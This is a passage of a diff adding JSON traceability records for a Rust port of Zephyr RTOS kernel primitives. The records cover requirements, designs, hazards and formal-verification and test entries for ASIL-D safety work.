+          "target": "ZEP-SRS-MQ-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MQ1: 0 <= used_msgs <= max_msgs (capacity invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "k_thread_priority_get returns the thread's current scheduling priority from base.prio. Maps to thread.c:124-131.\n",
+      "id": "SWREQ-TL-TH03",
+      "links": [
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "priority",
+        "asil-d"
+      ],
+      "title": "TH3: priority_get returns current thread priority",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full mutex test suite run under Miri to detect undefined behavior, use-after-free, out-of-bounds access, and uninitialized memory reads.\n",
+      "id": "UV-MUT-004",
+      "links": [
+        {
+          "target": "SWDD-MUT-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-LOCK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-LOCK-BLOCKING",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-UNLOCK",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "miri",
+        "safety",
+        "swe-4"
+      ],
+      "title": "Mutex Miri undefined behavior detection",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The Zephyr RTOS mutex shall support reentrant locking by the owning thread, incrementing the lock count on each successive lock by the same owner.\n",
+      "id": "ZEP-SRS-MUT-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MUT",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MUT-M04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mutex"
+      ],
+      "title": "Zephyr: Mutex Reentrant Locking",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's dynamic thread pool. Contains z_thread_stack_alloc_pool, z_impl_k_thread_stack_free. The Gale port models thread stack pool accounting only — bitarray management and actual stack allocation stay in C.\n",
+      "id": "PROV-DY-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "dynamic",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/dynamic.c — dynamic thread pool",
+      "type": "source-provenance"
+    },
+    {
+      "description": "No arithmetic operation on thread priorities, run queue indices, or scheduling counters causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-SC-SC16",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "SC16: no overflow in priority arithmetic",
+      "type": "sw-req"
+    },
+    {
+      "description": "Verus formal verification proofs covering arithmetic no-overflow postconditions across all kernel primitives.  Key artifacts: FV-SEM-001 (semaphore), FV-MUT-001 (mutex), FV-SC-001 (scheduler priority arithmetic), FV-TO-001 (timeout tick arithmetic), FV-SK-001 (stack index arithmetic).  All proofs check via Z3 as part of the CI pipeline.\n",
+      "id": "Sn-1",
+      "links": [
+        {
+          "target": "G-2",
+          "type": "supports"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "formal-verification",
+        "verus"
+      ],
+      "title": "Verus SMT/Z3 overflow-freedom proofs",
+      "type": "safety-solution"
+    },
+    {
+      "description": "Gale's verified kernel primitives (semaphore, mutex, condvar, etc.) are linked directly into Kiln as a Rust crate — no C FFI, no extern \"C\", no #[no_mangle].  Kiln registers these as WASM host functions that running components can import.  The call path from WASM application to kernel primitive is: WASM import → Kiln host dispatch → Gale Rust method call.  No ABI boundary crossing.\n",
+      "id": "SYSREQ-KILN-001",
+      "links": [
+        {
+          "target": "STKH-002",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "kiln",
+        "host-module",
+        "direct-call"
+      ],
+      "title": "Gale as Kiln host module with direct Rust calls",
+      "type": "system-req"
+    },
+    {
+      "description": "Integration tests in tests/sem_integration.rs exercising the full API surface across module boundaries.  Tests all ASIL-D properties (P1-P10) including invariant preservation, overflow safety, wait queue ordering, and compositional behavior.\n",
+      "id": "IV-SEM-001",
+      "links": [
+        {
+          "target": "SWARCH-SEM-001",
+          "type": "verifies"
+        },
+        {
+          "target": "SWARCH-WQ-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Semaphore integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "A spinlock state model that matches Zephyr's spinlock_validate.c semantics: ownership tracking, nesting depth, and IRQ state. Must enforce single-owner discipline and correct nesting depth.\n",
+      "id": "SYSREQ-SL-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "kernel"
+      ],
+      "title": "Spinlock ownership and nesting discipline model",
+      "type": "system-req"
+    },
+    {
+      "description": "Kani bounded model checking harnesses in tests/kani_harnesses.rs. Exhaustive exploration of condvar init, signal (empty/with-waiters), broadcast (empty/with-waiters), wait, broadcast idempotency, and signal-broadcast equivalence within bounded state space.\n",
+      "id": "UV-CV-003",
+      "links": [
+        {
+          "target": "SWDD-CV-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-SIGNAL",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-BROADCAST",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-WAIT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "kani",
+        "model-checking",
+        "swe-4"
+      ],
+      "title": "CondVar Kani bounded model checking",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Integration tests in tests/sched_integration.rs exercising the full scheduler API surface across module boundaries. Tests run queue add/remove/best, next_up selection, preemption decisions, suspend/resume cycles, yield reordering, priority ordering preservation, and cooperative/meta-IRQ interactions.\n",
+      "id": "IV-SC-001",
+      "links": [
+        {
+          "target": "SWARCH-SC-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Scheduler integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "No arithmetic operation on heap sizes, alignment values, or allocation counts causes integer overflow. All arithmetic is guarded by bounds checks or overflow-safe intrinsics.\n",
+      "id": "SWREQ-KH-KH06",
+      "links": [
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "KH6: no overflow in heap size arithmetic",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Gale kernel targets ARM Cortex-M microcontrollers with the Memory Protection Unit (MPU) as the sole hardware memory isolation mechanism.  There is no virtual memory or MMU.  All kernel code runs in privileged mode; user-space isolation is enforced via MPU regions programmed by the Zephyr userspace subsystem.\n",
+      "id": "C-1",
+      "links": [
+        {
+          "target": "G-1",
+          "type": "scopes"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "context",
+        "platform"
+      ],
+      "title": "Target platform — ARM Cortex-M, no MMU",
+      "type": "safety-context"
+    },
+    {
+      "description": "Each C-to-Rust FFI decision call shall complete in bounded time with no loops or recursion.  The Rust side performs a fixed sequence of comparisons and field updates, then returns a decision enum to the C shim.\n",
+      "id": "SWREQ-PERF-P01",
+      "links": [
+        {
+          "target": "SYSREQ-PERF-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-PERF-002",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "performance",
+        "ffi",
+        "bounded-time"
+      ],
+      "title": "PERF1: FFI call overhead is bounded (no loops or recursion)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full Zephyr kernel message queue test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_MSGQ=y. Tests exercise the complete k_msgq API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suites: zephyr/tests/kernel/msgq (msgq_api, msgq_api_1cpu, msgq_usage).\n",
+      "id": "SV-MQ-001",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "MsgQ Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Initialize an empty LIFO. Set count = 0.\n",
+      "id": "SWDD-LI-INIT",
+      "links": [
+        {
+          "target": "SWARCH-LI-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-LI-LI01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "init"
+      ],
+      "title": "Lifo::init — k_lifo_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Allocation succeeds only when there is sufficient free capacity and at least one free chunk. Full heap rejects allocation.\n",
+      "id": "SWREQ-HP-HP03",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "alloc",
+        "asil-d"
+      ],
+      "title": "HP3: alloc succeeds only when enough free space",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr timeslice enforcement integration tests executed on qemu_cortex_m3. Validates time-quantum preemption and cooperative thread exemption with Gale scheduler integration. Test suite: zephyr/tests/kernel/sched/scheduler_api.\n",
+      "id": "SV-TS-001",
+      "links": [
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Timeslice Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Property-based tests in tests/proptest_pipe.rs exercising init parameter validation, conservation after arbitrary operations, write clamping to free space, error code correctness, and reset emptying.\n",
+      "id": "UV-PP-002",
+      "links": [
+        {
+          "target": "SWDD-PP-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-WRITE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-READ",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-RESET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "proptest",
+        "swe-4"
+      ],
+      "title": "Pipe property-based tests (proptest)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Models the fixed-block pool allocator pattern used by CONFIG_DYNAMIC_THREAD_POOL_SIZE and sys_mem_pool. No single upstream C file — the pattern appears in kernel/dynamic.c and lib/heap infrastructure.\n",
+      "id": "PROV-MP-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "mempool",
+        "kernel"
+      ],
+      "title": "Zephyr memory pool pattern — fixed-block pool allocator",
+      "type": "source-provenance"
+    },
+    {
+      "description": "When give is called and the wait queue is non-empty, the highest-priority (numerically lowest) waiting thread is woken with return value 0 (OK).  The count does not change. Maps to z_impl_k_sem_give lines 103-108 in kernel/sem.c.\n",
+      "id": "SWREQ-SEM-P04",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-14",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "give",
+        "wake",
+        "asil-d"
+      ],
+      "title": "P4: give with waiters wakes highest-priority thread, count unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full Zephyr kernel LIFO test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_LIFO=y. Tests exercise the complete k_lifo API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suite: zephyr/tests/kernel/fifo/fifo_api (lifo variant).\n",
+      "id": "SV-LI-001",
+      "links": [
+        {
+          "target": "SYSREQ-LI-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "LIFO Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The system shall implement an event object supporting bitmask-based signaling between threads and ISRs.\n",
+      "id": "ZEP-SYRS-EV",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "event"
+      ],
+      "title": "Zephyr: Kernel Event",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement a memory pool providing fixed-block allocation with bounded capacity tracking.\n",
+      "id": "ZEP-SYRS-MP",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mempool"
+      ],
+      "title": "Zephyr: Memory Pool",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When free space is at or below the safety reserve threshold, the write admission control function returns a rejection error code for non-safety writes.  Safety-flagged writes are still admitted as long as physical flash space exists.  The rejection is deterministic and based solely on the current free space count and the reserve threshold — no probabilistic or heuristic logic.\n",
+      "id": "SWREQ-ZMS-P10",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-005",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "admission-control",
+        "threshold",
+        "asil-d"
+      ],
+      "title": "P10: Write admission control rejects when below safety threshold",
+      "type": "sw-req"
+    },
+    {
+      "description": "All address computations (start + size) are checked for u32 overflow using u64 intermediates.\n",
+      "id": "SWREQ-MD-MD06",
+      "links": [
+        {
+          "target": "SYSREQ-MD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "MD6: no overflow in address arithmetic (start + size <= u32::MAX)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Each monitoring subsystem shall be independently disableable via Kconfig (CONFIG_THREAD_MONITOR, CONFIG_SCHED_THREAD_USAGE, CONFIG_OBJ_CORE, CONFIG_SPIN_VALIDATE).  When disabled, the corresponding source files are excluded from the build.\n",
+      "id": "SWREQ-MON-M01",
+      "links": [
+        {
+          "target": "SYSREQ-MON-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "monitoring",
+        "kconfig"
+      ],
+      "title": "MON1: CONFIG guards for each monitoring subsystem",
+      "type": "sw-req"
+    },
+    {
+      "description": "Constructs an event with value = 0 (no bits set).\n",
+      "id": "SWDD-EV-INIT",
+      "links": [
+        {
+          "target": "SWARCH-EV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-EV-EV07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-EV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "init"
+      ],
+      "title": "Event::init — z_impl_k_event_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "suspend: remove from run queue, set state SUSPENDED. resume: if SUSPENDED, add to run queue, set state READY, reschedule. ready: add to run queue, set state READY, update cache. yield: move current to end of priority queue.\n",
+      "id": "SWDD-SC-FSM",
+      "links": [
+        {
+          "target": "SWARCH-SC-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SC-SC06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC07",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC08",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC09",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC10",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SC-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "fsm",
+        "suspend",
+        "resume"
+      ],
+      "title": "Scheduler thread state machine — suspend/resume/ready port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Both head and tail indices are always strictly less than capacity.\n",
+      "id": "SWREQ-RB-RB02",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "RB2: head < capacity, tail < capacity (index bounds)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Release by owner only. Decrement nest_count. If 0, clear owner. C source: kernel/spinlock_validate.c lines 23-37.\n",
+      "id": "SWDD-SL-RELEASE",
+      "links": [
+        {
+          "target": "SWARCH-SL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SL-SL02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SL-SL03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SL-SL04",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "release"
+      ],
+      "title": "SpinlockState::release — z_spin_unlock_valid port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The Zephyr RTOS condition variable signal shall wake exactly one waiting thread, selecting the highest-priority waiter from the wait queue.\n",
+      "id": "ZEP-SRS-CV-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-CV",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-CV-C02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "condvar"
+      ],
+      "title": "Zephyr: Condvar Signal Wakes One",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When push is called and count < capacity, count increments by 1 and returns OK. Maps to stack.c:101-136.\n",
+      "id": "SWREQ-SK-SK03",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SK-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "push",
+        "asil-d"
+      ],
+      "title": "SK3: push when not full increments count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Suspending a thread removes it from the run queue and sets its state to suspended. Maps to sched.c:491-523.\n",
+      "id": "SWREQ-SC-SC07",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "suspend",
+        "asil-d"
+      ],
+      "title": "SC7: suspend removes thread from run queue",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/fifo.rs covering init, put/get operations, empty boundary condition, put-get roundtrip, and count tracking.\n",
+      "id": "UV-FI-001",
+      "links": [
+        {
+          "target": "SWDD-FI-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-FI-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-FI-GET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "FIFO unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all timeout code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-TO-003",
+      "links": [
+        {
+          "target": "SWREQ-TO-TO01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Timeout Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all scheduler code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-SC-003",
+      "links": [
+        {
+          "target": "SWREQ-SC-SC01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Scheduler Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/error.rs wrapping Zephyr-compatible error code constants within a verus! block. Constants are verified as part of the overall Verus SMT pass. Executed via: bazel test //:verus_test\n",
+      "id": "FV-ERR-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P09",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Error Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "peek_at returns the correct ring buffer slot index for a given logical position within the occupied entries. Maps to msg_q.c:397-430.\n",
+      "id": "SWREQ-MQ-MQ10",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MQ-4",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "peek",
+        "asil-d"
+      ],
+      "title": "MQ10: peek_at computes correct slot index",
+      "type": "sw-req"
+    },
+    {
+      "description": "A thread stack grows beyond its allocated bounds and overwrites adjacent kernel or thread-control-block memory, silently corrupting kernel state.\n",
+      "id": "H-5",
+      "links": [
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "stack",
+        "memory-safety"
+      ],
+      "title": "Stack overflow corrupts adjacent memory",
+      "type": "hazard"
+    },
+    {
+      "description": "Insert thread into run queue at its priority position. If thread is already in queue, no-op.\n",
+      "id": "SWDD-SC-ADD",
+      "links": [
+        {
+          "target": "SWARCH-SC-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SC-SC01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC11",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC12",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SC-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "runq",
+        "add"
+      ],
+      "title": "RunQueue::add — runq_add port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "A push followed by a pop returns count to its original value.\n",
+      "id": "SWREQ-SK-SK09",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "roundtrip",
+        "asil-d"
+      ],
+      "title": "SK9: push-pop roundtrip preserves state",
+      "type": "sw-req"
+    },
+    {
+      "description": "Byte-stream pipe state machine and byte count model. Tracks used bytes, size capacity, and flags (FLAG_OPEN=1, FLAG_RESET=2) for write/read/reset/close validation. Ring buffer management stays in C — Gale verifies state and capacity safety only. No unsafe code.\n",
+      "id": "SWARCH-PP-001",
+      "links": [
+        {
+          "target": "SWREQ-PP-PP01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-PP-PP02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-PP-PP03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-PP-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "architecture"
+      ],
+      "title": "Pipe module (gale::pipe)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "CI build with all monitoring Kconfigs disabled (CONFIG_THREAD_MONITOR=n, CONFIG_SCHED_THREAD_USAGE=n, CONFIG_OBJ_CORE=n, CONFIG_SPIN_VALIDATE=n) on qemu_cortex_m3 confirms the full Gale test suite still passes and no monitoring symbols are linked into the safety-critical binary. Static symbol analysis confirms absence of monitoring function calls in Gale modules.\n",
+      "id": "SV-MON-001",
+      "links": [
+        {
+          "target": "SYSREQ-MON-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "monitoring",
+        "ci",
+        "sys-5"
+      ],
+      "title": "Monitoring exclusion system verification",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Thread-context non-panic faults are recoverable (AbortThread). ISR-context faults in production generally halt. Test mode is more permissive.\n",
+      "id": "SWREQ-FT-FT03",
+      "links": [
+        {
+          "target": "SYSREQ-FT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FT-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fatal",
+        "recovery",
+        "asil-d"
+      ],
+      "title": "FT3: recoverable decision depends on reason and context",
+      "type": "sw-req"
+    },
+    {
+      "description": "A work item state machine model that matches Zephyr's work.c semantics: init, submit, start_running, finish_running, cancel, and finish_cancel. Must maintain correct flag transitions.\n",
+      "id": "SYSREQ-WK-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-WK",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "kernel"
+      ],
+      "title": "Work item state machine model",
+      "type": "system-req"
+    },
+    {
+      "description": "A fixed-block memory pool model with alloc/free tracking. Must maintain allocation bounds, conservation invariant, and overflow safety.\n",
+      "id": "SYSREQ-MP-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-MP",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "kernel"
+      ],
+      "title": "Fixed-block memory pool model",
+      "type": "system-req"
+    },
+    {
+      "description": "The number of active thread stacks never exceeds the pool maximum.\n",
+      "id": "SWREQ-DY-DY01",
+      "links": [
+        {
+          "target": "SYSREQ-DY-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-DY-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dynamic",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "DY1: 0 <= active <= max_threads (bounds invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The sector state machine has exactly three states: EMPTY, OPEN, and CLOSED.  Transitions are restricted to: EMPTY → OPEN (erase then write header), OPEN → CLOSED (write close marker), and CLOSED → EMPTY (erase).  No other transition is possible.  This invariant ensures that sector lifecycle is well-defined and that exactly one sector is OPEN at any time.\n",
+      "id": "SWREQ-ZMS-P01",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-003",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "state-machine",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "P1: Sector state machine transitions are valid",
+      "type": "sw-req"
+    },
+    {
+      "description": "The block size is always strictly positive. Enforced by init rejecting block_size == 0 with -EINVAL.\n",
+      "id": "SWREQ-MS-MS03",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MS-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MS3: block_size > 0 (always after init)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The wait queue maintains priority ordering at all times.  Threads waiting on the mutex are unblocked strictly in priority order (numerically lowest value first).\n",
+      "id": "SWREQ-MUT-M11",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MUT-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "wait-queue",
+        "ordering",
+        "asil-d"
+      ],
+      "title": "M11: wait queue ordering preserved across all operations",
+      "type": "sw-req"
+    },
+    {
+      "description": "When attempting to acquire a semaphore, the Zephyr RTOS shall accept options that specify timeout periods, allowing threads to set a maximum wait time for semaphore acquisition.\n",
+      "id": "ZEP-SRS-5-9",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore acquisition timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Validate size > 0 (return Err(EINVAL) if zero). Set used = 0, flags = FLAG_OPEN.\n",
+      "id": "SWDD-PP-INIT",
+      "links": [
+        {
+          "target": "SWARCH-PP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PP-PP01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "init"
+      ],
+      "title": "Pipe::init — z_impl_k_pipe_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Threads with cooperative priority (negative priority values) are not preempted by threads of equal or lower priority.\n",
+      "id": "SWREQ-SC-SC14",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SC-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "cooperative",
+        "asil-d"
+      ],
+      "title": "SC14: cooperative threads not preempted",
+      "type": "sw-req"
+    },
+    {
+      "description": "When a stack slot is available, alloc increments the active count.\n",
+      "id": "SWREQ-DY-DY02",
+      "links": [
+        {
+          "target": "SYSREQ-DY-001",
+          "type": "derives-from"
+        },
